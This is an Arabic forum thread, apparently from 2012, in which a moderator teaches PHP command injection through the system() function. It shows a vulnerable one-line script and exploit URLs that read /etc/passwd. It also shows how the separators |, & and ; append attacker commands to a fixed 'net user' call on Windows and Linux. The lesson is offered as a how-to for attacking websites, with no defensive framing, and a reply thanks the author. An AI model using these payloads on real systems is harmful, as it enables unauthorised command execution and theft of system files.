منتدى قبيلة البشايره والعرافين الرسمى -من العضيان
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى قبيلة البشايره والعرافين الرسمى -من العضيان

عفواًً تم نقل المنتدى على الرابط لتالي http://albshaerh.com/vb/index.php
 
http://pesh.amuالرئيسيةأحدث الصورالتسجيلدخول

 

 


 

 تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
شرقاوي
مشرف عـام
مشرف عـام
شرقاوي


الساعه الان :
ذكر
عدد المساهمات : 229
نقاط : 4886
السٌّمعَة : 6
01/01/1988
تاريخ التسجيل : 09/12/2011
العمر : 36
الموقع : قمة أفرست

تقييمك للمنتدى
تواجدك في المنتدى:
تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Left_bar_bleue71/105تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Empty_bar_bleue  (71/105)

تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Empty
مُساهمةموضوع: تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس   تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Emptyالثلاثاء مارس 06, 2012 5:01 am

السلام عليكم ورحمة الله وبركـاته

كيف حال الجميع ؟ تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Al5

الجميع يعرف دالة سيستم وثغرات

Remote Command Execution

كود بسيط متل هيك


كود PHP:
system($_GET['red']);
?>

استغلاله هيبقى


كود:file.php?red=cat /etc/passwd
لحد هنا الامور تمام وده شيء بسيط بيتهيالي الكل بيدركه تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Al6

لكن الجديد في الموضوع لو كان الكود كده

تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس BRm06758

طبعا ده يعمل في ويندوز .. وبمجرد التصفح يديك النتيجة

تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس DJu06877

تمام .. لو تم التصفح وادخال قيمة يوزر متل b0x بالشكل التاني


كود:file.php?red=b0x
هنلاقي انه اعطانا معلومات بمعنى اصبح الامر الجاهز للتنفيذ في php بالشكل التالي


كود:net user b0x
وهذا يكون لك امر جاهز لكن احنا كيف رح نقوم بتغير الامر بمعنى الغاء الامر net user ووضع الامر الخاص فينا تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Al15

الكركتر البسيط

كود:|
او

كود:&
او

كود: ;
في لينكس وويندوز ..

صورة بعد التطبيق لامر


ver - يظهر اصدار كيرنل الويندوز
تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس DbZ07135

وامر

dir - يظهر الملفات و الفولدرز زي امر ls

تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس HOn07401

في لينكس كده تصير

كود:Red.php?red=b0x;cat /etc/passwd
بكده انتهينا تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Al5
درس خفيف تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Al4

الرجوع الى أعلى الصفحة اذهب الى الأسفل
راعي العمود

راعي العمود


الساعه الان :
ذكر
عدد المساهمات : 168
نقاط : 4987
السٌّمعَة : 7
10/07/1989
تاريخ التسجيل : 18/09/2011
العمر : 34

تقييمك للمنتدى
تواجدك في المنتدى:
تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Left_bar_bleue45/105تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Empty_bar_bleue  (45/105)

تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Empty
مُساهمةموضوع: رد: تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس   تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس Emptyالأحد مارس 11, 2012 7:41 pm

شكراًً لك اخي على الموضوع الرائع الله لايهينك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ويندوز Xp - جزء اول

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى قبيلة البشايره والعرافين الرسمى -من العضيان :: ¦’’ منتديات التقنية ’’ ¦ :: امن المواقع والسيرفات-
انتقل الى: